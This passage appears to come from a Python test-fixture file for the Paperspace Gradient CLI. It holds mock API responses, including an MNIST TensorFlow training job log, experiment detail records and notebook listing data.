"2019-07-08T12:41:13.425Z", "message": "I0708 12:41:13.425122 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.20186995, learning_rate = 1e-04, train_accuracy = 0.7125 (1.055 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 86, "timestamp": "2019-07-08T12:41:13.425Z", "message": "I0708 12:41:13.425472 140451862599424 basic_session_run_hooks.py:247] loss = 0.20186995, step = 300 (1.055 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 87, "timestamp": "2019-07-08T12:41:14.457Z", "message": "I0708 12:41:14.457170 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 96.7791" }, { "jobId": "jsy2ibsz1l026y", "line": 88, "timestamp": "2019-07-08T12:41:14.458Z", "message": "I0708 12:41:14.458280 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.14686151, learning_rate = 1e-04, train_accuracy = 0.762 (1.033 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 89, "timestamp": "2019-07-08T12:41:14.458Z", "message": "I0708 12:41:14.458536 140451862599424 basic_session_run_hooks.py:247] loss = 0.14686151, step = 400 (1.033 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 90, "timestamp": "2019-07-08T12:41:15.531Z", "message": "I0708 12:41:15.530984 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 93.1259" }, { "jobId": "jsy2ibsz1l026y", "line": 91, "timestamp": "2019-07-08T12:41:15.532Z", "message": "I0708 12:41:15.532083 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.115687564, learning_rate = 1e-04, train_accuracy = 0.795 (1.074 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 92, "timestamp": "2019-07-08T12:41:15.532Z", "message": "I0708 12:41:15.532342 140451862599424 basic_session_run_hooks.py:247] loss = 0.115687564, step = 500 (1.074 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 93, "timestamp": "2019-07-08T12:41:16.563Z", "message": "I0708 12:41:16.563513 140451862599424 basic_session_run_hooks.py:594] Saving checkpoints for 600 into /paperspace/models/mnist/model.ckpt." }, { "jobId": "jsy2ibsz1l026y", "line": 94, "timestamp": "2019-07-08T12:41:17.176Z", "message": "I0708 12:41:17.176506 140451862599424 estimator.py:1111] Calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 95, "timestamp": "2019-07-08T12:41:17.385Z", "message": "I0708 12:41:17.385438 140451862599424 estimator.py:1113] Done calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 96, "timestamp": "2019-07-08T12:41:17.41Z", "message": "I0708 12:41:17.410446 140451862599424 evaluation.py:257] Starting evaluation at 2019-07-08T12:41:17Z" }, { "jobId": "jsy2ibsz1l026y", "line": 97, "timestamp": "2019-07-08T12:41:17.517Z", "message": "I0708 12:41:17.517657 140451862599424 monitored_session.py:222] Graph was finalized." }, { "jobId": "jsy2ibsz1l026y", "line": 98, "timestamp": "2019-07-08T12:41:17.518Z", "message": "2019-07-08 12:41:17.518354: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1512] Adding visible gpu devices: 0" }, { "jobId": "jsy2ibsz1l026y", "line": 99, "timestamp": "2019-07-08T12:41:17.518Z", "message": "2019-07-08 12:41:17.518419: I tensorflow/core/common_runtime/gpu/gpu_device.cc:984] Device interconnect StreamExecutor with strength 1 edge matrix:" }, { "jobId": "jsy2ibsz1l026y", "line": 100, "timestamp": "2019-07-08T12:41:17.518Z", "message": "2019-07-08 12:41:17.518438: I tensorflow/core/common_runtime/gpu/gpu_device.cc:990] 0 " }, { "jobId": "jsy2ibsz1l026y", "line": 101, "timestamp": "2019-07-08T12:41:17.518Z", "message": "2019-07-08 12:41:17.518451: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1003] 0: N " }, { "jobId": "jsy2ibsz1l026y", "line": 102, "timestamp": "2019-07-08T12:41:17.518Z", "message": "2019-07-08 12:41:17.518626: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1115] Created TensorFlow device (/job:localhost/replica:0/task:0/device:GPU:0 with 10787 MB memory) -\u003e physical GPU (device: 0, name: Tesla K80, pci bus id: 0000:00:04.0, compute capability: 3.7)" }, { "jobId": "jsy2ibsz1l026y", "line": 103, "timestamp": "2019-07-08T12:41:17.519Z", "message": "W0708 12:41:17.519085 140451862599424 deprecation.py:323] From /usr/local/lib/python3.5/dist-packages/tensorflow/python/training/saver.py:1266: checkpoint_exists (from tensorflow.python.training.checkpoint_management) is deprecated and will be removed in a future version." }, { "jobId": "jsy2ibsz1l026y", "line": 104, "timestamp": "2019-07-08T12:41:17.519Z", "message": "Instructions for updating:" }, { "jobId": "jsy2ibsz1l026y", "line": 105, "timestamp": "2019-07-08T12:41:17.519Z", "message": "Use standard file APIs to check for files with this prefix." }, { "jobId": "jsy2ibsz1l026y", "line": 106, "timestamp": "2019-07-08T12:41:17.52Z", "message": "I0708 12:41:17.520449 140451862599424 saver.py:1270] Restoring parameters from /paperspace/models/mnist/model.ckpt-600" }, { "jobId": "jsy2ibsz1l026y", "line": 107, "timestamp": "2019-07-08T12:41:17.572Z", "message": "I0708 12:41:17.572486 140451862599424 session_manager.py:491] Running local_init_op." }, { "jobId": "jsy2ibsz1l026y", "line": 108, "timestamp": "2019-07-08T12:41:17.584Z", "message": "I0708 12:41:17.584268 140451862599424 session_manager.py:493] Done running local_init_op." }, { "jobId": "jsy2ibsz1l026y", "line": 109, "timestamp": "2019-07-08T12:41:19.062Z", "message": "I0708 12:41:19.062499 140451862599424 evaluation.py:277] Finished evaluation at 2019-07-08-12:41:19" }, { "jobId": "jsy2ibsz1l026y", "line": 110, "timestamp": "2019-07-08T12:41:19.063Z", "message": "I0708 12:41:19.062822 140451862599424 estimator.py:1979] Saving dict for global step 600: accuracy = 0.9691, global_step = 600, loss = 0.10409811" }, { "jobId": "jsy2ibsz1l026y", "line": 111, "timestamp": "2019-07-08T12:41:19.113Z", "message": "I0708 12:41:19.113427 140451862599424 estimator.py:2039] Saving 'checkpoint_path' summary for global step 600: /paperspace/models/mnist/model.ckpt-600" }, { "jobId": "jsy2ibsz1l026y", "line": 112, "timestamp": "2019-07-08T12:41:19.126Z", "message": "I0708 12:41:19.125805 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 27.817" }, { "jobId": "jsy2ibsz1l026y", "line": 113, "timestamp": "2019-07-08T12:41:19.126Z", "message": "I0708 12:41:19.126667 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.108451165, learning_rate = 1e-04, train_accuracy = 0.82285714 (3.595 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 114, "timestamp": "2019-07-08T12:41:19.127Z", "message": "I0708 12:41:19.126947 140451862599424 basic_session_run_hooks.py:247] loss = 0.108451165, step = 600 (3.595 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 115, "timestamp": "2019-07-08T12:41:20.185Z", "message": "I0708 12:41:20.185327 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 94.39" }, { "jobId": "jsy2ibsz1l026y", "line": 116, "timestamp": "2019-07-08T12:41:20.186Z", "message": "I0708 12:41:20.186514 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.122035645, learning_rate = 1e-04, train_accuracy = 0.8425 (1.060 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 117, "timestamp": "2019-07-08T12:41:20.186Z", "message": "I0708 12:41:20.186774 140451862599424 basic_session_run_hooks.py:247] loss = 0.122035645, step = 700 (1.060 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 118, "timestamp": "2019-07-08T12:41:21.256Z", "message": "I0708 12:41:21.255784 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 93.4188" }, { "jobId": "jsy2ibsz1l026y", "line": 119, "timestamp": "2019-07-08T12:41:21.257Z", "message": "I0708 12:41:21.256838 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.07952806, learning_rate = 1e-04, train_accuracy = 0.8577778 (1.070 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 120, "timestamp": "2019-07-08T12:41:21.257Z", "message": "I0708 12:41:21.257101 140451862599424 basic_session_run_hooks.py:247] loss = 0.07952806, step = 800 (1.070 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 121, "timestamp": "2019-07-08T12:41:22.288Z", "message": "I0708 12:41:22.287836 140451862599424 basic_session_run_hooks.py:680] global_step/sec: 96.8942" }, { "jobId": "jsy2ibsz1l026y", "line": 122, "timestamp": "2019-07-08T12:41:22.289Z", "message": "I0708 12:41:22.288971 140451862599424 basic_session_run_hooks.py:247] cross_entropy = 0.12382953, learning_rate = 1e-04, train_accuracy = 0.868 (1.032 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 123, "timestamp": "2019-07-08T12:41:22.289Z", "message": "I0708 12:41:22.289424 140451862599424 basic_session_run_hooks.py:247] loss = 0.12382953, step = 900 (1.032 sec)" }, { "jobId": "jsy2ibsz1l026y", "line": 124, "timestamp": "2019-07-08T12:41:23.297Z", "message": "I0708 12:41:23.297554 140451862599424 basic_session_run_hooks.py:594] Saving checkpoints for 1000 into /paperspace/models/mnist/model.ckpt." }, { "jobId": "jsy2ibsz1l026y", "line": 125, "timestamp": "2019-07-08T12:41:23.399Z", "message": "I0708 12:41:23.398564 140451862599424 training.py:525] Skip the current checkpoint eval due to throttle secs (10 secs)." }, { "jobId": "jsy2ibsz1l026y", "line": 126, "timestamp": "2019-07-08T12:41:23.451Z", "message": "I0708 12:41:23.450761 140451862599424 estimator.py:1111] Calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 127, "timestamp": "2019-07-08T12:41:23.655Z", "message": "I0708 12:41:23.655447 140451862599424 estimator.py:1113] Done calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 128, "timestamp": "2019-07-08T12:41:23.681Z", "message": "I0708 12:41:23.681046 140451862599424 evaluation.py:257] Starting evaluation at 2019-07-08T12:41:23Z" }, { "jobId": "jsy2ibsz1l026y", "line": 129, "timestamp": "2019-07-08T12:41:23.872Z", "message": "I0708 12:41:23.871646 140451862599424 monitored_session.py:222] Graph was finalized." }, { "jobId": "jsy2ibsz1l026y", "line": 130, "timestamp": "2019-07-08T12:41:23.872Z", "message": "2019-07-08 12:41:23.872269: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1512] Adding visible gpu devices: 0" }, { "jobId": "jsy2ibsz1l026y", "line": 131, "timestamp": "2019-07-08T12:41:23.872Z", "message": "2019-07-08 12:41:23.872324: I tensorflow/core/common_runtime/gpu/gpu_device.cc:984] Device interconnect StreamExecutor with strength 1 edge matrix:" }, { "jobId": "jsy2ibsz1l026y", "line": 132, "timestamp": "2019-07-08T12:41:23.872Z", "message": "2019-07-08 12:41:23.872338: I tensorflow/core/common_runtime/gpu/gpu_device.cc:990] 0 " }, { "jobId": "jsy2ibsz1l026y", "line": 133, "timestamp": "2019-07-08T12:41:23.872Z", "message": "2019-07-08 12:41:23.872353: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1003] 0: N " }, { "jobId": "jsy2ibsz1l026y", "line": 134, "timestamp": "2019-07-08T12:41:23.872Z", "message": "2019-07-08 12:41:23.872548: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1115] Created TensorFlow device (/job:localhost/replica:0/task:0/device:GPU:0 with 10787 MB memory) -\u003e physical GPU (device: 0, name: Tesla K80, pci bus id: 0000:00:04.0, compute capability: 3.7)" }, { "jobId": "jsy2ibsz1l026y", "line": 135, "timestamp": "2019-07-08T12:41:23.874Z", "message": "I0708 12:41:23.874099 140451862599424 saver.py:1270] Restoring parameters from /paperspace/models/mnist/model.ckpt-1000" }, { "jobId": "jsy2ibsz1l026y", "line": 136, "timestamp": "2019-07-08T12:41:23.932Z", "message": "I0708 12:41:23.932351 140451862599424 session_manager.py:491] Running local_init_op." }, { "jobId": "jsy2ibsz1l026y", "line": 137, "timestamp": "2019-07-08T12:41:23.946Z", "message": "I0708 12:41:23.946145 140451862599424 session_manager.py:493] Done running local_init_op." }, { "jobId": "jsy2ibsz1l026y", "line": 138, "timestamp": "2019-07-08T12:41:25.49Z", "message": "I0708 12:41:25.490408 140451862599424 evaluation.py:277] Finished evaluation at 2019-07-08-12:41:25" }, { "jobId": "jsy2ibsz1l026y", "line": 139, "timestamp": "2019-07-08T12:41:25.491Z", "message": "I0708 12:41:25.490850 140451862599424 estimator.py:1979] Saving dict for global step 1000: accuracy = 0.9787, global_step = 1000, loss = 0.0693267" }, { "jobId": "jsy2ibsz1l026y", "line": 140, "timestamp": "2019-07-08T12:41:25.491Z", "message": "I0708 12:41:25.491545 140451862599424 estimator.py:2039] Saving 'checkpoint_path' summary for global step 1000: /paperspace/models/mnist/model.ckpt-1000" }, { "jobId": "jsy2ibsz1l026y", "line": 141, "timestamp": "2019-07-08T12:41:25.492Z", "message": "I0708 12:41:25.492296 140451862599424 training.py:928] Calling exporter with the `is_the_final_export=True`." }, { "jobId": "jsy2ibsz1l026y", "line": 142, "timestamp": "2019-07-08T12:41:25.492Z", "message": "I0708 12:41:25.492531 140451862599424 util.py:168] Finalize strategy." }, { "jobId": "jsy2ibsz1l026y", "line": 143, "timestamp": "2019-07-08T12:41:25.572Z", "message": "I0708 12:41:25.571871 140451862599424 estimator.py:359] Loss for final step: 0.03955281." }, { "jobId": "jsy2ibsz1l026y", "line": 144, "timestamp": "2019-07-08T12:41:25.572Z", "message": "I0708 12:41:25.572580 140451862599424 mnist.py:240] Starting to Export model to /paperspace/models" }, { "jobId": "jsy2ibsz1l026y", "line": 145, "timestamp": "2019-07-08T12:41:25.583Z", "message": "I0708 12:41:25.583298 140451862599424 estimator.py:1111] Calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 146, "timestamp": "2019-07-08T12:41:25.744Z", "message": "I0708 12:41:25.744162 140451862599424 estimator.py:1113] Done calling model_fn." }, { "jobId": "jsy2ibsz1l026y", "line": 147, "timestamp": "2019-07-08T12:41:25.744Z", "message": "W0708 12:41:25.744491 140451862599424 deprecation.py:323] From /usr/local/lib/python3.5/dist-packages/tensorflow/python/saved_model/signature_def_utils_impl.py:205: build_tensor_info (from tensorflow.python.saved_model.utils_impl) is deprecated and will be removed in a future version." }, { "jobId": "jsy2ibsz1l026y", "line": 148, "timestamp": "2019-07-08T12:41:25.744Z", "message": "Instructions for updating:" }, { "jobId": "jsy2ibsz1l026y", "line": 149, "timestamp": "2019-07-08T12:41:25.744Z", "message": "This function will only be available through the v1 compatibility library as tf.compat.v1.saved_model.utils.build_tensor_info or tf.compat.v1.saved_model.build_tensor_info." }, { "jobId": "jsy2ibsz1l026y", "line": 150, "timestamp": "2019-07-08T12:41:25.745Z", "message": "I0708 12:41:25.745018 140451862599424 export.py:587] Signatures INCLUDED in export for Regress: None" }, { "jobId": "jsy2ibsz1l026y", "line": 151, "timestamp": "2019-07-08T12:41:25.745Z", "message": "I0708 12:41:25.745139 140451862599424 export.py:587] Signatures INCLUDED in export for Train: None" }, { "jobId": "jsy2ibsz1l026y", "line": 152, "timestamp": "2019-07-08T12:41:25.745Z", "message": "I0708 12:41:25.745274 140451862599424 export.py:587] Signatures INCLUDED in export for Predict: ['serving_default', 'classify']" }, { "jobId": "jsy2ibsz1l026y", "line": 153, "timestamp": "2019-07-08T12:41:25.745Z", "message": "I0708 12:41:25.745424 140451862599424 export.py:587] Signatures INCLUDED in export for Classify: None" }, { "jobId": "jsy2ibsz1l026y", "line": 154, "timestamp": "2019-07-08T12:41:25.745Z", "message": "I0708 12:41:25.745549 140451862599424 export.py:587] Signatures INCLUDED in export for Eval: None" }, { "jobId": "jsy2ibsz1l026y", "line": 155, "timestamp": "2019-07-08T12:41:25.746Z", "message": "2019-07-08 12:41:25.746041: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1512] Adding visible gpu devices: 0" }, { "jobId": "jsy2ibsz1l026y", "line": 156, "timestamp": "2019-07-08T12:41:25.746Z", "message": "2019-07-08 12:41:25.746099: I tensorflow/core/common_runtime/gpu/gpu_device.cc:984] Device interconnect StreamExecutor with strength 1 edge matrix:" }, { "jobId": "jsy2ibsz1l026y", "line": 157, "timestamp": "2019-07-08T12:41:25.746Z", "message": "2019-07-08 12:41:25.746110: I tensorflow/core/common_runtime/gpu/gpu_device.cc:990] 0 " }, { "jobId": "jsy2ibsz1l026y", "line": 158, "timestamp": "2019-07-08T12:41:25.746Z", "message": "2019-07-08 12:41:25.746126: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1003] 0: N " }, { "jobId": "jsy2ibsz1l026y", "line": 159, "timestamp": "2019-07-08T12:41:25.746Z", "message": "2019-07-08 12:41:25.746278: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1115] Created TensorFlow device (/job:localhost/replica:0/task:0/device:GPU:0 with 10787 MB memory) -\u003e physical GPU (device: 0, name: Tesla K80, pci bus id: 0000:00:04.0, compute capability: 3.7)" }, { "jobId": "jsy2ibsz1l026y", "line": 160, "timestamp": "2019-07-08T12:41:25.779Z", "message": "I0708 12:41:25.778900 140451862599424 saver.py:1270] Restoring parameters from /paperspace/models/mnist/model.ckpt-1000" }, { "jobId": "jsy2ibsz1l026y", "line": 161, "timestamp": "2019-07-08T12:41:25.814Z", "message": "I0708 12:41:25.814109 140451862599424 builder_impl.py:654] Assets added to graph." }, { "jobId": "jsy2ibsz1l026y", "line": 162, "timestamp": "2019-07-08T12:41:25.814Z", "message": "I0708 12:41:25.814344 140451862599424 builder_impl.py:449] No assets to write." }, { "jobId": "jsy2ibsz1l026y", "line": 163, "timestamp": "2019-07-08T12:41:25.878Z", "message": "I0708 12:41:25.877661 140451862599424 builder_impl.py:414] SavedModel written to: /paperspace/models/temp-b'1562589685'/saved_model.pb" }, { "jobId": "jsy2ibsz1l026y", "line": 164, "timestamp": "2019-07-08T12:41:25.878Z", "message": "I0708 12:41:25.878680 140451862599424 mnist.py:247] Model Exported" }, { "jobId": "jsy2ibsz1l026y", "line": 165, "timestamp": "2019-07-08T12:41:25.879Z", "message": "Gradient SDK not installed. Distributed training is not possible" }, { "jobId": "jsy2ibsz1l026y", "line": 166, "timestamp": "2019-07-08T12:41:25.879Z", "message": "" }, { "jobId": "jsy2ibsz1l026y", "line": 167, "timestamp": "2019-07-08T12:41:25.879Z", "message": "WARNING: The TensorFlow contrib module will not be included in TensorFlow 2.0." }, { "jobId": "jsy2ibsz1l026y", "line": 168, "timestamp": "2019-07-08T12:41:25.879Z", "message": "For more information, please see:" }, { "jobId": "jsy2ibsz1l026y", "line": 169, "timestamp": "2019-07-08T12:41:25.879Z", "message": " * https://github.com/tensorflow/community/blob/master/rfcs/20180907-contrib-sunset.md" }, { "jobId": "jsy2ibsz1l026y", "line": 170, "timestamp": "2019-07-08T12:41:25.879Z", "message": " * https://github.com/tensorflow/addons" }, { "jobId": "jsy2ibsz1l026y", "line": 171, "timestamp": "2019-07-08T12:41:25.879Z", "message": "If you depend on functionality not listed there, please file an issue." }, { "jobId": "jsy2ibsz1l026y", "line": 172, "timestamp": "2019-07-08T12:41:25.879Z", "message": "" }, { "jobId": "jsy2ibsz1l026y", "line": 173, "timestamp": "2019-07-08T12:41:25.879Z", "message": "Downloading https://storage.googleapis.com/cvdf-datasets/mnist/train-images-idx3-ubyte.gz to /tmp/tmp5a21acuc.gz" }, { "jobId": "jsy2ibsz1l026y", "line": 174, "timestamp": "2019-07-08T12:41:25.879Z", "message": "Downloading https://storage.googleapis.com/cvdf-datasets/mnist/train-labels-idx1-ubyte.gz to /tmp/tmpl6cdsahk.gz" }, { "jobId": "jsy2ibsz1l026y", "line": 175, "timestamp": "2019-07-08T12:41:25.879Z", "message": "Downloading https://storage.googleapis.com/cvdf-datasets/mnist/t10k-images-idx3-ubyte.gz to /tmp/tmplh4ob02m.gz" }, { "jobId": "jsy2ibsz1l026y", "line": 176, "timestamp": "2019-07-08T12:41:25.879Z", "message": "Downloading https://storage.googleapis.com/cvdf-datasets/mnist/t10k-labels-idx1-ubyte.gz to /tmp/tmpbrss4txl.gz" }, { "jobId": "jsy2ibsz1l026y", "line": 177, "timestamp": "2019-07-08T12:41:36.525Z", "message": "PSEOF" } ] DETAILS_OF_SINGLE_NODE_EXPERIMENT_RESPONSE_JSON = { "data": { "dtCreated": "2020-04-02T21:37:00.000000+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-22T13:22:27.200591+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 21814, "experimentTemplateId": 60, "experimentTypeId": 1, "handle": "esro6mbmiulvbl", "id": 21784, "projectHandle": "prq70zy79", "projectId": 612, "started_by_user_id": 1655, "state": 1, "tags": [ { "name": "tag1", }, { "name": "tag2", }, ], "templateHistory": { "dtCreated": "2019-03-22T13:22:26.375543+00:00", "dtDeleted": None, "experimentTemplateId": 60, "id": 21814, "params": { "experimentTypeId": 1, "name": "dsfads", "ports": 5000, "project_handle": "prq70zy79", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "C2" }, "triggerEvent": None, "triggerEventId": None }, "datasets": [ { "uri": "s3://some/dataset", "volume_options": { "kind": "dynamic", "size": "10Gi", }, }, ], }, "message": "success" } DETAILS_OF_MULTI_NODE_EXPERIMENT_RESPONSE_JSON = { "data": { "dtCreated": "2019-12-16T16:18:47.881765+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-12-16T16:18:47.881765+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 34335, "experimentTemplateId": 439, "experimentTypeId": 3, "handle": "emarbao6t6tsn", "id": 34272, "projectHandle": "pr85u3sfa", "projectId": 1824, "started_by_user_id": 1655, "state": 10, "tags": [ { "name": "tag1", }, { "name": "tag2", }, ], "templateHistory": { "cliCommand": "gradient experiments create multinode --name some_name --projectId pr85u3sfa --experimentType MPI --workerContainer python --workerMachineType c5.xlarge --workerCommand \"echo worker\" --workerCount 2 --masterContainer python --masterMachineType c5.xlarge --masterCommand \"echo master\" --masterCount 1 --workspaceUrl some.url --workingDirectory /some/working/directory --clusterId clqr4b0ox --experimentEnv '{\"key\": \"value\"}' --ports 5000 --modelType some_type --modelPath /some/model/path", "dtCreated": "2019-12-16T16:18:46.577973+00:00", "dtDeleted": None, "experimentTemplateId": 439, "id": 34335, "params": { "artifact_directory": "/some/artifact/directory", "cluster_id": "clqr4b0ox", "experiment_env": { "key": "value" }, "is_preemptible": False, "model_path": "/some/model/path", "model_type": "some_type", "name": "some_name", "ports": "5000", "project_handle": "pr85u3sfa", "version": "v2", "working_directory": "/some/working/directory", "workspace_url": "some.url" }, "triggerEvent": None, "triggerEventId": None } }, "message": "success" } NOTEBOOK_GET_RESPONSE = { "name": "some_name", "handle": "ngw7piq9", "jobHandle": "jzhmk7fpluqje", "project": "Notebook-some_name", "projectHandle": "prg284tu2", "state": "Running", "token": "dc2c331ce694ebe5a615f6e5885f6a933fcb1be49cb0d17f", "container": "Paperspace + Fast.AI 1.0 (V3)", "containerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "baseContainer": "Paperspace + Fast.AI 1.0 (V3)", "baseContainerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "vmType": "K80", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "ngw7piq9.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "some_namespace", "parentJobId": None, "jobError": None, "dtCreated": "2019-09-03T11:06:18.154Z", "dtModified": "2019-09-03T11:06:18.154Z", "dtProvisioningStarted": "2019-09-03T11:08:36.286Z", "dtProvisioningFinished": "2019-09-03T11:10:36.471Z", "dtStarted": "2019-09-03T11:10:36.471Z", "dtFinished": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": 6, "jobId": 20206, "isPublic": False, "isPreemptible": False, "cpuHostname": "gradient-host-1567508793", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "12297212 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617088427", "gpuDevice": "/dev/nvidia0", "gpuDriver": "418.67", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1823, "metricsURL": "aws-testing.paperspace.io", } NOTEBOOK_GET_RESPONSE_WITH_TAGS = { "name": "some_name", "handle": "ngw7piq9", "jobHandle": "jzhmk7fpluqje", "project": "Notebook-some_name", "projectHandle": "prg284tu2", "state": "Running", "token": "dc2c331ce694ebe5a615f6e5885f6a933fcb1be49cb0d17f", "container": "Paperspace + Fast.AI 1.0 (V3)", "containerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "baseContainer": "Paperspace + Fast.AI 1.0 (V3)", "baseContainerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "vmType": "K80", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "ngw7piq9.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "some_namespace", "parentJobId": None, "jobError": None, "dtCreated": "2019-09-03T11:06:18.154Z", "dtModified": "2019-09-03T11:06:18.154Z", "dtProvisioningStarted": "2019-09-03T11:08:36.286Z", "dtProvisioningFinished": "2019-09-03T11:10:36.471Z", "dtStarted": "2019-09-03T11:10:36.471Z", "dtFinished": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": 6, "jobId": 20206, "isPublic": False, "isPreemptible": False, "cpuHostname": "gradient-host-1567508793", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "12297212 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617088427", "gpuDevice": "/dev/nvidia0", "gpuDriver": "418.67", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1823, "tags": [ "tag1", "tag2" ], } NOTEBOOKS_LIST_RESPONSE_JSON = { "notebookList": [ { "name": "job 1", "handle": "n1vmfj6x", "jobHandle": "jsh0692p80dphg", "project": "Notebook-undefined", "projectHandle": "pr231zktg", "state": "Running", "token": "80426c989ef8d42b4dff6806c9592b1111a47c63c0f4a36f", "container": "Paperspace + Fast.AI 1.0 (V3)", "containerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "baseContainer": "Paperspace + Fast.AI 1.0 (V3)", "baseContainerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "vmType": "K80", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "n1vmfj6x.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": None, "dtCreated": "2019-09-04T11:06:12.667Z", "dtModified": "2019-09-04T11:06:12.667Z", "dtProvisioningStarted": "2019-09-04T11:08:28.305Z", "dtProvisioningFinished": "2019-09-04T11:10:30.628Z", "dtStarted": "2019-09-04T11:10:30.628Z", "dtFinished": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": None, "jobId": 20221, "isPublic": False, "isPreemptible": False, "cpuHostname": "gradient-host-1567595186", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "12297212 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617028675", "gpuDevice": "/dev/nvidia0", "gpuDriver": "418.67", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1832 }, { "name": "job 1", "handle": "nhdf8zf3", 